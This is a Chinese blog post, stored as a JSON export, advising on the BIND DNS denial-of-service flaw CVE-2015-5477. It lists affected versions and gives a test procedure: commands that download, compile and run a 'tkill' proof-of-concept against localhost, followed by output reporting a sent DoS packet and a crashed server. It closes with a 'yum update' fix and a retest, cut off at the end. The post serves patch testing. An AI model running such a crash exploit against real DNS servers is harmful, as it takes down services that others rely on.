{"id":417,"date":"2015-08-08T10:30:59","date_gmt":"2015-08-08T02:30:59","guid":{"rendered":"http:\/\/www.ipcpu.com\/?p=417"},"modified":"2015-08-08T10:30:59","modified_gmt":"2015-08-08T02:30:59","slug":"cve-2015-5477","status":"publish","type":"post","link":"https:\/\/c.ipcpu.com\/2015\/08\/cve-2015-5477\/","title":{"rendered":"DNS\u670d\u52a1\u5668\u8f6f\u4ef6BIND\u66dd\u4e25\u91cdDoS\u6f0f\u6d1e\uff08CVE-2015-5477\uff09"},"content":{"rendered":"
DNS\u670d\u52a1\u5668\u8f6f\u4ef6BIND\u66dd\u4e25\u91cdDoS\u6f0f\u6d1e\uff08CVE-2015-5477\uff09<\/p>\n
\u8fd1\u671fISC\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u6f0f\u6d1e\uff08cve-2015-5477),\u8be5\u6f0f\u6d1e\u5f71\u54cd\u5f53\u524dBind\u6240\u6709\u975e\u6700\u65b0\u7248\u672c\uff0c\u9ed1\u5ba2\u53ef\u4ee5\u5229\u7528\u8be5\u6f0f\u6d1e\u5bf9BIND DNS\u670d\u52a1\u8fdb\u884cDOS\u653b\u51fb\uff0c\u5bfc\u81f4DNS\u670d\u52a1\u8fdb\u7a0b\u7ed3\u675f\u3002<\/p>\n
\u81ea\u7f16\u8bd1\u7248\u672c 9.1.0 -> 9.8.x, 9.9.0->9.9.7-P1, 9.10.0->9.10.2-P2
Redhat AS6 \u7248\u672c < bind-9.8.2-0.37.rc1.el6_7.2\u7248\u672c
Redhat AS5 \u7248\u672c < bind-9.3.6-25.P1.el5_11.3 \u7248\u672c<\/p>\n
\u975e\u5e38\u5371\u9669\uff0c\u8bf7\u52ff\u6d4b\u8bd5\u7ebf\u4e0a\u670d\u52a1\u2014\u2014\u5b58\u5728\u6f0f\u6d1e\u7684DNS\u670d\u52a1\u5b88\u62a4\u8fdb\u7a0b\u4f1acrash<\/strong> B. \u6d4b\u8bd5\u73b0\u8c61<\/p>\n \u7ecf\u68c0\u67e5named\u8fdb\u7a0b\u5df2\u7ecfcrash<\/p>\n C. \u670d\u52a1\u65e5\u5fd7<\/p>\n \u5347\u7ea7\u5230\u6700\u65b0\u7248\uff0c\u624b\u52a8\u7f16\u8bd1\u7248\u672c\u4e5f\u53ef\u4ee5\u6253\u8865\u4e01\u3002<\/p>\n \u5b98\u65b9\u7f51\u7ad9\u8c8c\u4f3c\u6ca1\u6709\u8865\u4e01\u5305\uff0c\u53ef\u4ee5\u4eceRedhat\u7684FTP\u63d0\u4f9b\u7684srpm\u6587\u4ef6\u67e5\u627e<\/p>\n \u66f4\u65b0\u540e\u7684\u6d4b\u8bd5<\/p>\n
A. \u6d4b\u8bd5\u65b9\u6cd5<\/p>\n[@<\/span> <\/span>~]#<\/span> wget http<\/span>:<\/span>\/\/NOTVALID\/script\/tkill.c<\/span><\/code><\/li>
[@<\/span> <\/span>~]#<\/span> gcc <\/span>-<\/span>g <\/span>-<\/span>o tkill tkill<\/span>.<\/span>c<\/span><\/code><\/li>
[@<\/span> <\/span>~]#<\/span> chmod a<\/span>+<\/span>x tkill<\/span><\/code><\/li>
[@<\/span> <\/span>~]#<\/span> <\/span>.\/<\/span>tkill localhost<\/span><\/code><\/li>
#\u5982DNS\u670d\u52a1crash\uff0c\u8bf4\u660e\u8be5DNS\u5b58\u5728\u6f0f\u6d1e\uff0c\u5982\u51fa\u73b0 not vulnerable\u5b57\u6837\uff0c\u5219\u8868\u793a\u6f0f\u6d1e\u672a\u751f\u6548\u3002<\/span><\/code><\/li><\/ol><\/pre>\n
[@<\/span> <\/span>~]#<\/span> <\/span>.\/<\/span>tkill localhost<\/span><\/code><\/li>
---<\/span> <\/span>PoC<\/span> <\/span>for<\/span> CVE<\/span>-<\/span>2015<\/span>-<\/span>5477<\/span> BIND9 TKEY <\/span>assert<\/span> <\/span>DoS<\/span> <\/span>---<\/span><\/code><\/li>
[+]<\/span> localhost<\/span>:<\/span> <\/span>Resolving<\/span> to IP address<\/span><\/code><\/li>
[+]<\/span> localhost<\/span>:<\/span> <\/span>Resolved<\/span> to multiple <\/span>IPs<\/span> <\/span>(<\/span>NOTE<\/span>)<\/span><\/code><\/li>
[+]<\/span> <\/span>::<\/span>1<\/span>:<\/span> <\/span>Probing<\/span>...<\/span><\/code><\/li>
[+]<\/span> <\/span>Querying<\/span> version<\/span>...<\/span><\/code><\/li>
[+]<\/span> <\/span>::<\/span>1<\/span>:<\/span> <\/span>\"9.11.0pre-alpha\"<\/span><\/code><\/li>
[+]<\/span> <\/span>Sending<\/span> <\/span>DoS<\/span> packet<\/span>...<\/span><\/code><\/li>
[+]<\/span> <\/span>Waiting<\/span> <\/span>5<\/span>-<\/span>sec <\/span>for<\/span> response<\/span>...<\/span><\/code><\/li>
[+]<\/span> timed <\/span>out<\/span>,<\/span> probably crashed<\/span><\/code><\/li>
[+]<\/span> <\/span>127.0<\/span>.<\/span>0.1<\/span>:<\/span> <\/span>Probing<\/span>...<\/span><\/code><\/li>
[+]<\/span> <\/span>Querying<\/span> version<\/span>...<\/span><\/code><\/li>
[-]<\/span> timed <\/span>out<\/span> getting version<\/span>,<\/span> trying again<\/span><\/code><\/li>
[-]<\/span> timed <\/span>out<\/span> getting version<\/span>,<\/span> trying again<\/span><\/code><\/li>
[-]<\/span> timed <\/span>out<\/span> getting version<\/span>,<\/span> trying again<\/span><\/code><\/li>
[-]<\/span> <\/span>Can<\/span>'t query server, is it crashed already?<\/span><\/code><\/li>
[-] Sending exploit anyway.<\/span><\/code><\/li>
[+] Sending DoS packet...<\/span><\/code><\/li>
[+] Waiting 5-sec for response...<\/span><\/code><\/li>
[+] timed out, probably crashed<\/span><\/code><\/li><\/ol><\/pre>\n
Aug<\/span> <\/span>4<\/span> <\/span>15<\/span>:<\/span>32<\/span>:<\/span>48<\/span> dns named<\/span>[<\/span>2717<\/span>]:<\/span> client a<\/span>.<\/span>b<\/span>.<\/span>c<\/span>.<\/span> d<\/span>#42212 (foo.bar): view north_america: query: foo. bar ANY TKEY + (x.y.z.zz)<\/span><\/code><\/li><\/ol><\/pre>\n
\u89e3\u51b3\u65b9\u6848\uff1a<\/h3>\n
[@<\/span> <\/span>~]#<\/span> yum update bind<\/span><\/code><\/li><\/ol><\/pre>\n
[@<\/span> <\/span>~]#<\/span> <\/span>.\/<\/span>tkill localhost<\/span><\/code><\/li>
---<\/span> <\/span>PoC<\/span> <\/span>